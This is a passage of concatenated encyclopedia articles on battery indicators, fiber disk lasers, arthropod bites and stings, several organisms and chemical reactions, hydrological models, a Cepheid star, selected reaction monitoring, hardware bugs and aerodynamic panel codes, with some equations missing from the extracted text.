battery with a specified EMF, in series with an internal resistance. As a battery discharges, the EMF may drop or the internal resistance increase; in many cases the EMF remains more or less constant during most of the discharge, with the voltage drop across the internal resistance determining the voltage supplied. Determining the charge remaining in many battery types not connected to a system that monitors battery use is not reliably possible with a voltmeter. In battery types where EMF remains approximately constant during discharge, but resistance increases, voltage across battery terminals is not a good indicator of capacity. A meter such as an equivalent series resistance meter (ESR meter) normally used for measuring the ESR of electrolytic capacitors can be used to evaluate internal resistance. ESR meters fitted with protective diodes cannot be used, a battery will simply destroy the diodes and damage itself. An ESR meter known not to have diode protection will give a reading of internal resistance for a rechargeable or non-rechargeable battery of any size down to the smallest button cells which gives an indication of the state of charge. To use it, measurements on fully charged and fully discharged batteries of the same type can be used to determine resistances associated with those states. The cost of an ESR meter makes it uneconomic for measuring battery voltages as its only function, but a meter used for cheeking capacitors can take on the additional duty. See also Battery Management System Smart Battery Data State Of Health State of charge Smart battery References Indicator Measuring instruments Auto parts
Battery indicator
Technology,Engineering
713
10,295,673
https://en.wikipedia.org/wiki/Fiber%20disk%20laser
A fiber disk laser is a fiber laser with transverse delivery of the pump light. They are characterized by the pump beam not being parallel to the active core of the optical fiber (as in a double-clad fiber), but directed to the coil of the fiber at an angle (usually, between 10 and 40 degrees). This allows use of the specific shape of the pump beam emitted by the laser diode, providing the efficient use of the pump. Realizations of fiber disk lasers First disk lasers were developed in the Institute for Laser Science, Japan. Several realizations of fiber disk lasers were reported. The fiber disk laser is so named because the fiber is tightly coiled. Typically, no special feedback for the laser frequency is required, as the small reflection at end of the fiber is sufficient to provide efficient operation. In this case, both ends of the coiled fiber can be used as output. Application and power scaling Fiber disk lasers are used for cutting of metal (up to few mm thick), welding and folding. The disk-shaped configuration allows efficient heat dissipation (usually, the disks are cooled with flowing water), allowing power scaling. When the increase of the length of the fiber becomes limited by stimulated scattering, additional power scaling can be achieved by combining several fiber disk lasers into a stack. The spiral-coiled configuration is not the only possible arrangement; any other scheme of stacking of optical fibers with lateral delivery of pump can also be called a fiber disk laser, even if the resulting shape of the device is not circular. The term fiber disk laser applies to the concept of lateral delivery of pump to the active optical fiber rather than specifically to a disk-shaped device. The optimal shape of the fiber disk laser may depend on the properties of the beam of pump available, as well as on the specific application. References External links http://www.nature.com/nphoton/journal/vsample/nsample/full/nphoton.2006.6.html IEEE http://sciencelinks.jp/j-east/article/200705/000020070506A1021450.php Solid-state lasers Fiber optics
Fiber disk laser
Chemistry
446
27,090,911
https://en.wikipedia.org/wiki/Arthropod%20bites%20and%20stings
Many species of arthropods (insects, arachnids, millipedes and centipedes) can bite or sting human beings. These bites and stings generally occur as a defense mechanism or during normal arthropod feeding. While most cases cause self-limited irritation, medically relevant complications include envenomation, allergic reactions, and transmission of vector-borne diseases. Signs and symptoms Most arthropod bites and stings cause self-limited redness, itchiness and/or pain around the site. Less commonly (around 10% of Hymenoptera sting reactions), a large local reaction occurs when the area of swelling is greater than . Rarely (1-3% of Hymenoptera sting reactions), systemic reactions can affect multiple organs and pose a medical emergency, as in the case of anaphylactic shock. Defensive and predatory bites and stings Many arthropods bite or sting in order to immobilize their prey or deter potential predators as a defense mechanism. Stings containing venom are more likely to be painful. Less frequently, venomous spider bites are also associated with morbidity and mortality in humans. Most arthropod stings involve Hymenoptera (ants, wasps, and bees). While the majority of Hymenoptera stings are locally painful, their associated venom rarely cause toxic reactions unless victims receive many stings at once. The low mortality (around 60 deaths per year in the US out of unreported millions of stings nationwide) associated with Hymenoptera is mostly due to anaphylaxis from venom hypersensitivity. Most scorpion stings also cause self-limited pain or paresthesias. Only certain species (from family Buthidae) inject neurotoxic venom, responsible for most morbidity and mortality. Severe toxic reactions can occur resulting in progressive hemodynamic instability, neuromuscular dysfunction, cardiogenic shock, pulmonary edema, multi-organ failure, and death. Although robust epidemiological data is unavailable, global estimates of scorpion stings exceed 1.2 million resulting in more than 3000 deaths annually. Spider bites most often cause minor symptoms and resolve without intervention. Medically significant spider bites involve substantial envenomation from only certain species such as widow spiders and recluse spiders. Symptoms of latrodectism (from widow spiders) may include pain at the bite or involve the chest and abdomen, sweating, muscle cramps and vomiting among others. By comparison, loxoscelism (from recluse spiders) can present with local necrosis of the surrounding skin and widespread breakdown of red blood cells. Headaches, vomiting and a mild fever may also occur. Feeding bites Feeding bites have characteristic patterns and symptoms that reflect feeding habits of the offending pest and the chemistry of its saliva. Feeding bites are less likely to be felt at the time of the bite, although there are some exceptions. Since feeding requires longer attachment to prey than envenomation, feeding bites are more often associated with vector transmission of disease. As vectors of disease In addition to stings and bites causing discomfort in of themselves, bites can also spread secondary infections if the arthropod is carrying a virus, bacteria, or parasite. The World Health Organization (WHO) estimates that 17% of all infectious diseases worldwide were transmitted by arthropod vectors, resulting in over 700,000 deaths annually. The table below lists common arthropod vectors and their associated diseases. The figure below represents endemic areas of common vector-borne diseases. *Estimated global number of cases annually according to WHO in 2017. If a vector transmits multiple diseases, aggregate case numbers are listed. Rough estimates are only meant to provide a sense of scale. Unknown disease burden is listed as NA for not available. Diagnosis Most arthropod bites and stings do not require a specific diagnosis since they typically improve with supportive management alone. Certain bites and stings present with characteristic appearances and distributions. In general, however, dermoscopic findings of bitten or stung skin rarely aid in diagnosis. Rather, patient history (recent travel to endemic areas, outdoor activities, and other risk factors) primarily guides the diagnostic approach, which can raise clinical suspicion for more serious complications like vector-borne diseases. Microscopic appearance Skin biopsies are not indicated for bites or stings, since the histomorphologic appearance is non-specific. Bites and stings as well as other conditions (e.g. drug reactions, urticarial reactions, and early bullous pemphigoid) can cause microscopic changes such as a wedge-shaped superficial dermal perivascular infiltrate consisting of abundant lymphocytes and scattered eosinophils, as shown in the adjacent figure: Prevention Prevention strategies against arthropod bites and stings comprise measures for personal protection, travel advisories, public health and environmental concerns. Personal protection Travelers should seek to minimize outdoor activity during peak activity times and avoid high risk areas such as regions with known outbreaks or epidemics. Standing water and dense vegetation also commonly attract arthropods. Clothes covering most exposed skin can also provide a measure of physical protection, which may be augmented when the fabric is treated with pesticides such as Permethrin. Topical repellants such as N,N-diethyl-m-toluamide (DEET) is supported by a large body of evidence. Vaccines may also help prevent vector-borne diseases for eligible patients. For example, Japanese encephalitis, Yellow fever, and Dengue fever have FDA-approved vaccines available. Since they are relatively new vaccines, however, they are not standard of care as of 2023. Additionally, patients traveling to Malaria endemic regions are routinely prescribed Malaria chemoprophylaxis. Patients with a history of venom hypersensitivity may benefit from venom immunotherapy (VIT). Patients eligibile for VIT include those with a prior anaphylactic reaction to a venomous sting and who have IgE to venom allergens. VIT can help prevent future severe systemic reactions in select patients. Global health International organizations such as WHO aim to reduce disease burdens of neglected tropical diseases, many of which are vector borne. Such campaigns must incorporate multipronged approaches to consider global inequality, access to resources, and climate change. Management Most arthropod bites and stings require only supportive care. However, complications such as envenomation and severe allergic reactions can present as medical emergencies. Supportive care Local reactions to bites and stings are treated symptomatically. If a stinger is still embedded, manual removal can reduce further irritation. Washing the affected area with soap and water can help reduce risk of contamination. Oral antihistamines, calamine lotion, topical corticosteroids and cold compresses are common over the counter remedies to reduce itchiness and local inflammation. In more severe cases, such as large local reactions, systemic glucocorticoids are sometimes prescribed, although limited evidence supports their effectiveness. There are limited data to support one treatment over another. Medical emergencies Systemic reactions from venom hypersensitivity can rapidly progress to a medical emergency. The mainstay of anaphylactic shock management is intramuscularly injected epinephrine. The patient should be stabilized and transferred to an intensive care unit. Toxic reactions to envenomation are similarly managed with medical stabilization and symptomatic treatment. Tetanus prophylaxis should be up to date but antibiotics are typically unnecessary unless a bacterial superinfection is suspected. Antivenom drugs have been created for certain species such as Centruroides scorpion stings, but these drugs are not yet widely available and so typically reserved for severe systemic toxicity. Several vector-borne diseases can present emergently. Treatment of vector-borne diseases After confirmation of diagnosis, antimicrobials are prescribed according to standard of care. Biting and stinging arthropods A bite is defined as coming from the mouthparts of the arthropod. The bite consists of both the bite wound and the saliva. The saliva of the arthropod may contain anticoagulants, as in insects and arachnids which feed from blood. Feeding bites may also contain anaesthetic, to prevent the bite from being felt. Feeding bites may also contain digestive enzymes, as in spiders; spider bites have primarily evolved to paralyse and then digest prey. A sting comes from the abdomen; in most insects (which are all largely hymenopterans), the stinger is a modified ovipositor, which protrudes from the abdomen. The sting consists of an insertion wound, and venom. The venom is evolved to cause pain to a predator, paralyse a prey item, or both. Because insect stingers evolved from ovipositors, in most hymenopterans only the female can sting. However, there are a few orders of wasp where the male has evolved a "pseudo sting" - the male genitalia has evolved two sharp protrusions which can deliver an insertion wound. However, they do not contain venom, so they are not considered a true sting. In ants that bite instead of sting, such as the Formicinae, the bite causes the wound, but during the bite the abdomen bends forward to spray formic acid into the wound, causing additional pain. In arachnids that sting (all largely scorpions), the stinger is not a modified ovipositor, but instead a metasoma that bears a telson. (Scorpions lack an ovipositor entirely and give birth to live young.) Insects Diptera (True flies) Black flies (Simuliidae) Horse-flies (Tabanidae) Deer flies/Yellow flies (Chrysops) Tsetse flies (Glossinidae) Stable flies (Muscidae) Biting midges or No see-ums (Ceratopogonidae) Highland midge Mosquitos (Culicidae) Botflies (as larvae, Oestridae) Sandflies (Phlebotomidae) Lutzomyia Phlebotomus Blow-flies (as larvae, Calliphoridae) Screw-worm flies (as larvae, Calliphoridae) Hippoboscidae (Keds) Hymenoptera (ants, bees and wasps) Ants Bull ants (sting) Fire ants (both bite and sting) Bullet ants (sting) Bees Honeybees (sting) Stingless bees (bite) Bumblebees (sting) Wasps (sting) Hornets (sting) Yellow Jackets (sting) Paper wasps (sting) Siphonaptera (Fleas) Fleas (bite) Human flea Pulex irritans Chigoe flea Tunga penetrans Phthiraptera (Lice) Lice (bite) Head lice Body lice Crab lice Other insects Assassin bug/Kissing bug Bedbugs Conenose bug Arachnids Spiders Mites Chiggers Red Poultry Mite Spiny rat mite House mouse mite Northern fowl mite Tropical fowl mite Mange mite Scabies Ticks Scorpions All species sting Myriapoda Centipedes References External links Identifying insect bites and stings Diagnosing Mysterious "Bug Bites" Lists of animals Medical lists Arthropods and humans Parasitic infestations, stings, and bites of the skin Arthropod attacks
Arthropod bites and stings
Biology
2,387
73,960,946
https://en.wikipedia.org/wiki/Retiperidiolia
Retiperidiolia is a genus of fungi in the family Nidulariaceae. Basidiocarps (fruit bodies) are typically under 10 mm in diameter and irregularly spherical. Each produces a number of peridioles which contain the spores and are released from the disintegrating fruit bodies at maturity. Species are usually found growing on herbaceous stems and other plant debris. The genus has a tropical distribution. Species were previously referred to Mycocalia, but molecular research, based on cladistic analysis of DNA sequences, found that they were not closely related. See also List of Agaricales genera References Nidulariaceae Agaricales genera Taxa described in 2022 Fungi
Retiperidiolia
Biology
144
7,668,353
https://en.wikipedia.org/wiki/Amadori%20rearrangement
The Amadori rearrangement is an organic reaction describing the acid or base catalyzed isomerization or rearrangement reaction of the N-glycoside of an aldose or the glycosylamine to the corresponding 1-amino-1-deoxy-ketose. The reaction is important in carbohydrate chemistry, specifically the glycation of hemoglobin (as measured by the HbA1c test). The rearrangement is usually preceded by formation of a α-hydroxyimine by condensation of an amine with an aldose sugar. The rearrangement itself entails intramolecular redox reaction, converting this α-hydroxyimine to an α-ketoamine: The formation of imines is generally reversible, but subsequent to conversion to the keto-amine, the attached amine is fixed irreversibly. This Amadori product is an intermediate in the production of advanced glycation end-products (AGE)s. The formation of an advanced glycation end-product involves the oxidation of the Amadori product. Food chemistry The reaction is associated with the amino-carbonyl reactions (also called glycation reaction, or Maillard reaction) in which the reagents are naturally occurring sugars and amino acids. One study demonstrated the possibility of Amadori rearrangement during interaction between oxidized dextran and gelatine. History The Amadori rearrangement was discovered by the organic chemist Mario Amadori (1886–1941), who in 1925 reported this reaction while studying the Maillard reaction. See also Fructoselysine, the Amadori product derived from glucose and lysine Glycated hemoglobin, the Amadori product used in the HbA1c diagnostic test for diabetes References External links Amadori Rearrangement, PowerPoint presentation detailing the reaction mechanism Rearrangement reactions Post-translational modification Name reactions
Amadori rearrangement
Chemistry
416
70,847,281
https://en.wikipedia.org/wiki/Capsulimonas
Capsulimonas is a Gram-negative, non-spore-forming, aerobic and non-motile genus of bacteria from the family of Capsulimonadaceae with one known species (Capsulimonas corticalis). Capsulimonas corticalis has been isolated from the surface of a beech (Fagus crenata) See also List of bacterial orders List of bacteria genera References Bacteria Bacteria genera Monotypic bacteria genera Taxa described in 2019
Capsulimonas
Biology
99
17,673,401
https://en.wikipedia.org/wiki/Hydrological%20model
A hydrologic model is a simplification of a real-world system (e.g., surface water, soil water, wetland, groundwater, estuary) that aids in understanding, predicting, and managing water resources. Both the flow and quality of water are commonly studied using hydrologic models. Analog models Prior to the advent of computer models, hydrologic modeling used analog models to simulate flow and transport systems. Unlike mathematical models that use equations to describe, predict, and manage hydrologic systems, analog models use non-mathematical approaches to simulate hydrology. Two general categories of analog models are common; scale analogs that use miniaturized versions of the physical system and process analogs that use comparable physics (e.g., electricity, heat, diffusion) to mimic the system of interest. Scale analogs Scale models offer a useful approximation of physical or chemical processes at a size that allows for greater ease of visualization. The model may be created in one (core, column), two (plan, profile), or three dimensions, and can be designed to represent a variety of specific initial and boundary conditions as needed to answer a question. Scale models commonly use physical properties that are similar to their natural counterparts (e.g., gravity, temperature). Yet, maintaining some properties at their natural values can lead to erroneous predictions. Properties such as viscosity, friction, and surface area must be adjusted to maintain appropriate flow and transport behavior. This usually involves matching dimensionless ratios (e.g., Reynolds number, Froude number). Groundwater flow can be visualized using a scale model built of acrylic and filled with sand, silt, and clay. Water and tracer dye may be pumped through this system to represent the flow of the simulated groundwater. Some physical aquifer models are between two and three dimensions, with simplified boundary conditions simulated using pumps and barriers. Process analogs Process analogs are used in hydrology to represent fluid flow using the similarity between Darcy's law, Ohm's law, Fourier's law, and Fick's law. The analogs to fluid flow are the flux of electricity, heat, and solutes, respectively. The corresponding analogs to fluid potential are voltage, temperature, and solute concentration (or chemical potential). The analogs to hydraulic conductivity are electrical conductivity, thermal conductivity, and the solute diffusion coefficient. An early process analog model was an electrical network model of an aquifer composed of resistors in a grid. Voltages were assigned along the outer boundary, and then measured within the domain. Electrical conductivity paper can also be used instead of resistors. Statistical models Statistical models are a type of mathematical model that are commonly used in hydrology to describe data, as well as relationships between data. Using statistical methods, hydrologists develop empirical relationships between observed variables, find trends in historical data, or forecast probable storm or drought events. Moments Statistical moments (e.g., mean, standard deviation, skewness, kurtosis) are used to describe the information content of data. These moments can then be used to determine an appropriate frequency distribution, which can then be used as a probability model. Two common techniques include L-moment ratios and Moment-Ratio Diagrams. The frequency of extremal events, such as severe droughts and storms, often requires the use of distributions that focus on the tail of the distribution, rather than the data nearest the mean. These techniques, collectively known as extreme value analysis, provide a methodology for identifying the likelihood and uncertainty of extreme events. Examples of extreme value distributions include the Gumbel, Pearson, and generalized extreme value. The standard method for determining peak discharge uses the log-Pearson Type III (log-gamma) distribution and observed annual flow peaks. Correlation analysis The degree and nature of correlation may be quantified, by using a method such as the Pearson correlation coefficient, autocorrelation, or the T-test. The degree of randomness or uncertainty in the model may also be estimated using stochastics, or residual analysis. These techniques may be used in the identification of flood dynamics, storm characterization, and groundwater flow in karst systems. Regression analysis is used in hydrology to determine whether a relationship may exist between independent and dependent variables. Bivariate diagrams are the most commonly used statistical regression model in the physical sciences, but there are a variety of models available from simplistic to complex. In a bivariate diagram, a linear or higher-order model may be fitted to the data. Factor analysis and principal component analysis are multivariate statistical procedures used to identify relationships between hydrologic variables. Convolution is a mathematical operation on two different functions to produce a third function. With respect to hydrologic modeling, convolution can be used to analyze stream discharge's relationship to precipitation. Convolution is used to predict discharge downstream after a precipitation event. This type of model would be considered a “lag convolution”, because of the predicting of the “lag time” as water moves through the watershed using this method of modeling. Time-series analysis is used to characterize temporal correlation within a data series as well as between different time series. Many hydrologic phenomena are studied within the context of historical probability. Within a temporal dataset, event frequencies, trends, and comparisons may be made by using the statistical techniques of time series analysis. The questions that are answered through these techniques are often important for municipal planning, civil engineering, and risk assessments. Markov chains are a mathematical technique for determine the probability of a state or event based on a previous state or event. The event must be dependent, such as rainy weather. Markov Chains were first used to model rainfall event length in days in 1976, and continues to be used for flood risk assessment and dam management. Data-driven models Data-driven models in hydrology emerged as an alternative approach to traditional statistical models, offering a more flexible and adaptable methodology for analysing and predicting various aspects of hydrological processes. While statistical models rely on rigorous assumptions about probability distributions, data-driven models leverage techniques from artificial intelligence, machine learning, and statistical analysis, including correlation analysis, time series analysis, and statistical moments, to learn complex patterns and dependencies from historical data. This allows them to make more accurate predictions and provide insights into the underlying processes. Since their inception in the latter half of the 20th century, data-driven models have gained popularity in the water domain, as they help improve forecasting, decision-making, and management of water resources. A couple of notable publications that use data-driven models in hydrology include "Application of machine learning techniques for rainfall-runoff modelling" by Solomatine and Siek (2004), and "Data-driven modelling approaches for hydrological forecasting and prediction" by Valipour et al. (2021). These models are commonly used for predicting rainfall, runoff, groundwater levels, and water quality, and have proven to be valuable tools for optimizing water resource management strategies. Conceptual models Conceptual models represent hydrologic systems using physical concepts. The conceptual model is used as the starting point for defining the important model components. The relationships between model components are then specified using algebraic equations, ordinary or partial differential equations, or integral equations. The model is then solved using analytical or numerical procedures. Conceptual models are commonly used to represent the important components (e.g., features, events, and processes) that relate hydrologic inputs to outputs. These components describe the important functions of the system of interest, and are often constructed using entities (stores of water) and relationships between these entitites (flows or fluxes between stores). The conceptual model is coupled with scenarios to describe specific events (either input or outcome scenarios). For example, a watershed model could be represented using tributaries as boxes with arrows pointing toward a box that represents the main river. The conceptual model would then specify the important watershed features (e.g., land use, land cover, soils, subsoils, geology, wetlands, lakes), atmospheric exchanges (e.g., precipitation, evapotranspiration), human uses (e.g., agricultural, municipal, industrial, navigation, thermo- and hydro-electric power generation), flow processes (e.g., overland, interflow, baseflow, channel flow), transport processes (e.g., sediments, nutrients, pathogens), and events (e.g., low-, flood-, and mean-flow conditions). Model scope and complexity is dependent on modeling objectives, with greater detail required if human or environmental systems are subject to greater risk. Systems modeling can be used for building conceptual models that are then populated using mathematical relationships. Example 1 The linear-reservoir model (or Nash model) is widely used for rainfall-runoff analysis. The model uses a cascade of linear reservoirs along with a constant first-order storage coefficient, K, to predict the outflow from each reservoir (which is then used as the input to the next in the series). The model combines continuity and storage-discharge equations, which yields an ordinary differential equation that describes outflow from each reservoir. The continuity equation for tank models is: which indicates that the change in storage over time is the difference between inflows and outflows. The storage-discharge relationship is: where K is a constant that indicates how quickly the reservoir drains; a smaller value indicates more rapid outflow. Combining these two equation yields and has the solution: Example 2 Instead of using a series of linear reservoirs, also the model of a non-linear reservoir can be used. In such a model the constant K in the above equation, that may also be called reaction factor, needs to be replaced by another symbol, say α (Alpha), to indicate the dependence of this factor on storage (S) and discharge (q). In the left figure the relation is quadratic: α = 0.0123 q2 + 0.138 q - 0.112 Governing equations Governing equations are used to mathematically define the behavior of the system. Algebraic equations are likely often used for simple systems, while ordinary and partial differential equations are often used for problems that change in space in time. Examples of governing equations include: Manning's equation is an algebraic equation that predicts stream velocity as a function of channel roughness, the hydraulic radius, and the channel slope: Darcy's law describes steady, one-dimensional groundwater flow using the hydraulic conductivity and the hydraulic gradient: Groundwater flow equation describes time-varying, multidimensional groundwater flow using the aquifer transmissivity and storativity: Advection-Dispersion equation describes solute movement in steady, one-dimensional flow using the solute dispersion coefficient and the groundwater velocity: Poiseuille's law describes laminar, steady, one-dimensional fluid flow using the shear stress: Cauchy's integral is an integral method for solving boundary value problems: Solution algorithms Analytic methods Exact solutions for algebraic, differential, and integral equations can often be found using specified boundary conditions and simplifying assumptions. Laplace and Fourier transform methods are widely used to find analytic solutions to differential and integral equations. Numeric methods Many real-world mathematical models are too complex to meet the simplifying assumptions required for an analytic solution. In these cases, the modeler develops a numerical solution that approximates the exact solution. Solution techniques include the finite-difference and finite-element methods, among many others. Specialized software may also be used to solve sets of equations using a graphical user interface and complex code, such that the solutions are obtained relatively rapidly and the program may be operated by a layperson or an end user without a deep knowledge of the system. There are model software packages for hundreds of hydrologic purposes, such as surface water flow, nutrient transport and fate, and groundwater flow. Commonly used numerical models include SWAT, MODFLOW, FEFLOW, PORFLOW, MIKE SHE, and WEAP. Model calibration and evaluation Physical models use parameters to characterize the unique aspects of the system being studied. These parameters can be obtained using laboratory and field studies, or estimated by finding the best correspondence between observed and modelled behavior. Between neighbouring catchments which have physical and hydrological similarities, the model parameters varies smoothly suggesting the spatial transferability of parameters. Model evaluation is used to determine the ability of the calibrated model to meet the needs of the modeler. A commonly used measure of hydrologic model fit is the Nash-Sutcliffe efficiency coefficient. See also Hydrological optimization Scientific modelling Soil and Water Assessment Tool References External links http://drought.unl.edu/MonitoringTools/DownloadableSPIProgram.aspx Water resources management
Hydrological model
Biology,Environmental_science
2,629
41,729,693
https://en.wikipedia.org/wiki/T%20Vulpeculae
T Vulpeculae is a possible binary star system in the northern constellation of Vulpecula, near the star Zeta Cygni, close to the pair 31 Vulpeculae and 32 Vulpeculae. It is visible to the naked eye with an apparent visual magnitude that ranges around 5.75. The distance to this system is around 1,900 light years, as determined from its annual parallax shift of . A well-studied Classical Cepheid variable and one of the brightest known, the apparent magnitude of T Vulpeculae ranges from 5.41 to 6.09 over a period of 4.435 days. It is a yellow-white hued supergiant of spectral type F5 Ib. The variability of T Vul was discovered in 1885 by Edwin Sawyer. Observations between 1885 and 2003 shows a small but continuous decrease in the period of variability amounting to 0.25 seconds per year. The companion star was detected in 1992; it is an A-type main-sequence star with a class of A0.8 V and 2.1 times the Sun's mass. Orbital periods of 738 and 1,745 days have been proposed for the pair, although, as of 2015, there remains doubt as to whether this is an actual binary system. References Classical Cepheid variables F-type supergiants A-type main-sequence stars Binary stars Vulpecula Durchmusterung objects 198726 102949 7988 Vulpeculae, T
T Vulpeculae
Astronomy
317
21,953,783
https://en.wikipedia.org/wiki/Selected%20reaction%20monitoring
Selected reaction monitoring (SRM), also called multiple reaction monitoring (MRM), is a method used in tandem mass spectrometry in which an ion of a particular mass is selected in the first stage of a tandem mass spectrometer and an ion product of a fragmentation reaction of the precursor ions is selected in the second mass spectrometer stage for detection. Variants A general case of SRM can be represented by where the precursor ion ABCD+ is selected by the first stage of mass spectrometry (MS1), dissociates into molecule AB and product ion CD+, and the latter is selected by the second stage of mass spectrometry (MS2) and detected. The precursor and product ion pair is called a SRM "transition". Consecutive reaction monitoring (CRM) is the serial application of three or more stages of mass spectrometry to SRM, represented in a simple case by where ABCD+ is selected by MS1, dissociates into molecule AB and ion CD+. The ion is selected in the second mass spectrometry stage MS2 then undergoes further fragmentation to form ion D+ which is selected in the third mass spectrometry stage MS3 and detected. Multiple reaction monitoring (MRM) is the application of selected reaction monitoring to multiple product ions from one or more precursor ions, for example where ABCD+ is selected by MS1 and dissociates by two pathways, forming either AB+ or CD+. The ions are selected sequentially by MS2 and detected. Parallel reaction monitoring (PRM) is the application of SRM with parallel detection of all transitions in a single analysis using a high resolution mass spectrometer. Proteomics SRM can be used for targeted quantitative proteomics by mass spectrometry. Following ionization in, for example, an electrospray source, a peptide precursor is first isolated to obtain a substantial ion population of mostly the intended species. This population is then fragmented to yield product ions whose signal abundances are indicative of the abundance of the peptide in the sample. This experiment can be performed on triple quadrupole mass spectrometers, where mass-resolving Q1 isolates the precursor, q2 acts as a collision cell, and mass-resolving Q3 is cycled through the product ions which are detected upon exiting the last quadrupole by an electron multiplier. A precursor/product pair is often referred to as a transition. Much work goes into ensuring that transitions are selected that have maximum specificity. Using isotopic labeling with heavy-labeled (e.g., D, 13C, or 15N) peptides to a complex matrix as concentration standards, SRM can be used to construct a calibration curve that can provide the absolute quantification (i.e., copy number per cell) of the native, light peptide, and by extension, its parent protein. SRM has been used to identify the proteins encoded by wild-type and mutant genes (mutant proteins) and quantify their absolute copy numbers in tumors and biological fluids, thus answering the basic questions about the absolute copy number of proteins in a single cell, which will be essential in digital modelling of mammalian cells and human body, and the relative levels of genetically abnormal proteins in tumors, and proving useful for diagnostic applications. SRM has also been used as a method of triggering full product ion scans of peptides to either a) confirm the specificity of the SRM transition, or b) detect specific post-translational modifications which are below the limit of detection of standard MS analyses. In 2017, SRM has been developed to be a highly sensitive and reproducible mass spectrometry-based protein targeted detection platform (entitled "SAFE-SRM"), and it has been demonstrated that the SRM-based new pipeline has major advantages in clinical proteomics applications over traditional SRM pipelines, and it has demonstrated a dramatically improved diagnostic performance over that from antibody-based protein biomarker diagnostic methods, such as ELISA. See also Protein mass spectrometry Quantitative proteomics References External links SRMatlas; quantify proteins in complex proteome digests by mass spectrometry Mass spectrometry Proteomics
Selected reaction monitoring
Physics,Chemistry
878
42,872,715
https://en.wikipedia.org/wiki/Tambjamine
Tambjamines are a group of natural products that are structurally related to the prodiginines. They are enamine derivatives of 4-methoxy-2,2'-bipyrrole-5-carboxaldehyde (MBC). Chemical structure Tambjamines are composed of two pyrrole rings with an enamine moiety at C-5 and a methoxy group at C-4: the majority have short alkyl chains connected to the enamine nitrogen. This group of alkaloids have been isolated from marine invertebrates and bacteria (both marine and terrestrial). Marine sources and ecological roles The large nudibranch Roboastra tigris is a known predator of Tambja eliora and Tambja abdere, two species of smaller nudibranchs. The chemical extracts of all three nudibranch species contain tambjamines, which were traced to Sessibugula translucens, a food source of the two prey species. It is hypothesized that tambjamines are a chemical defence mechanism of the bryozoan against feeding by the spotted kelpfish Gibbonsia elegans. Production Biosynthesis The biosynthetic gene cluster responsible for tambjamine production was identified in 2007 using functional genomic analysis of a Pseudoalteromonas tunicata strain. The Tam cluster consists of 19 proteins, 12 of which were found to be highly similar to proteins in the Red and Pig pathways from prodigiosin biosynthesis, based on sequence data. The biosynthesis of tambjamine YP1 first involves the incorporation of proline, malonyl Co-A, and serine to form 4-methoxy-2,2'-bipyrrole-5-carboxaldehyde (MBC). AfaA is hypothesized to activate long-chain fatty acids while the predicted dehydrogenase, TamT, introduces a double bond into a fatty acyl side chain. TamH then carries out the reduction of the CoA-ester to form an aldehyde intermediate, followed by transamination. Condensation of the dodec-3-en-1-amine product of this reaction and MBC by TamQ, results in the tambjamine YP1 (compound 21 in Figure 1). Laboratory The aldehyde MBC was first prepared by total synthesis when the structure of prodigiosin was being investigated. It has subsequently been synthesised by other methods and used to make tambjamines and related natural products. See also Prodiginines References Alkaloids Enamines Ethers Pyrroles
Tambjamine
Chemistry
566
5,907,652
https://en.wikipedia.org/wiki/Hardware%20bug
A hardware bug is a bug in computer hardware. It is the hardware counterpart of software bug, a defect in software. A bug is different from a glitch which describes an undesirable behavior as more quick, transient and repeated than constant, and different from a quirk which is a behavior that may be considered useful even though not intentionally designed. Errata, corrections to the documentation, may be published by the manufacturer to describe hardware bugs, and errata is sometimes used as a term for the bugs themselves. History Unintended operation Sometimes users take advantage of the unintended or undocumented operation of hardware to serve some purpose, in which case a flaw may be considered a feature. This gives rise to the often ironically employed acronym INABIAF, "It's Not A Bug It's A Feature". For example, undocumented instructions, known as illegal opcodes, on the MOS Technology 6510 of the Commodore 64 and MOS Technology 6502 of the Apple II computers are sometimes utilized. Security vulnerabilities Some flaws in hardware may lead to security vulnerabilities where memory protection or other features fail to work properly. Starting in 2017 a series of security vulnerabilities were found in the implementations of speculative execution on common processor architectures that allowed a violation of privilege level. In 2019 researchers discovered that a manufacturer debugging mode, known as VISA, had an undocumented feature on Intel Platform Controller Hubs, known as chipsets, which made the mode accessible with a normal motherboard possibly leading to a security vulnerability. Pentium bugs The Intel Pentium series of CPUs had two well-known bugs discovered after it was brought to market, the FDIV bug affecting floating point division which resulted in a recall in 1994, and the F00F bug discovered in 1997 which causes the processor to stop operating until rebooted. References Hardware bugs Engineering concepts
Hardware bug
Engineering
390
17,303,780
https://en.wikipedia.org/wiki/Aerodynamic%20potential-flow%20code
In fluid dynamics, aerodynamic potential flow codes or panel codes are used to determine the fluid velocity, and subsequently the pressure distribution, on an object. This may be a simple two-dimensional object, such as a circle or wing, or it may be a three-dimensional vehicle. A series of singularities as sources, sinks, vortex points and doublets are used to model the panels and wakes. These codes may be valid at subsonic and supersonic speeds. History Early panel codes were developed in the late 1960s to early 1970s. Advanced panel codes, such as Panair (developed by Boeing), were first introduced in the late 1970s, and gained popularity as computing speed increased. Over time, panel codes were replaced with higher order panel methods and subsequently CFD (Computational Fluid Dynamics). However, panel codes are still used for preliminary aerodynamic analysis as the time required for an analysis run is significantly less due to a decreased number of elements. Assumptions These are the various assumptions that go into developing potential flow panel methods: Inviscid Incompressible Irrotational Steady However, the incompressible flow assumption may be removed from the potential flow derivation leaving: Potential flow (inviscid, irrotational, steady) Derivation of panel method solution to potential flow problem From Small Disturbances (subsonic) From Divergence Theorem Let Velocity U be a twice continuously differentiable function in a region of volume V in space. This function is the stream function . Let P be a point in the volume V Let S be the surface boundary of the volume V. Let Q be a point on the surface S, and . As Q goes from inside V to the surface of V, Therefore: For :, where the surface normal points inwards. This equation can be broken down into both a source term and a doublet term. The Source Strength at an arbitrary point Q is: The Doublet Strength at an arbitrary point Q is: The simplified potential flow equation is: With this equation, along with applicable boundary conditions, the potential flow problem may be solved. Required boundary conditions The velocity potential on the internal surface and all points inside V (or on the lower surface S) is 0. The Doublet Strength is: The velocity potential on the outer surface is normal to the surface and is equal to the freestream velocity. These basic equations are satisfied when the geometry is a 'watertight' geometry. If it is watertight, it is a well-posed problem. If it is not, it is an ill-posed problem. Discretization of potential flow equation The potential flow equation with well-posed boundary conditions applied is: Note that the integration term is evaluated only on the upper surface, while th integral term is evaluated on the upper and lower surfaces. The continuous surface S may now be discretized into discrete panels. These panels will approximate the shape of the actual surface. This value of the various source and doublet terms may be evaluated at a convenient point (such as the centroid of the panel). Some assumed distribution of the source and doublet strengths (typically constant or linear) are used at points other than the centroid. A single source term s of unknown strength and a single doublet term m of unknown strength are defined at a given point. where: These terms can be used to create a system of linear equations which can be solved for all the unknown values of . Methods for discretizing panels constant strength - simple, large number of panels required linear varying strength - reasonable answer, little difficulty 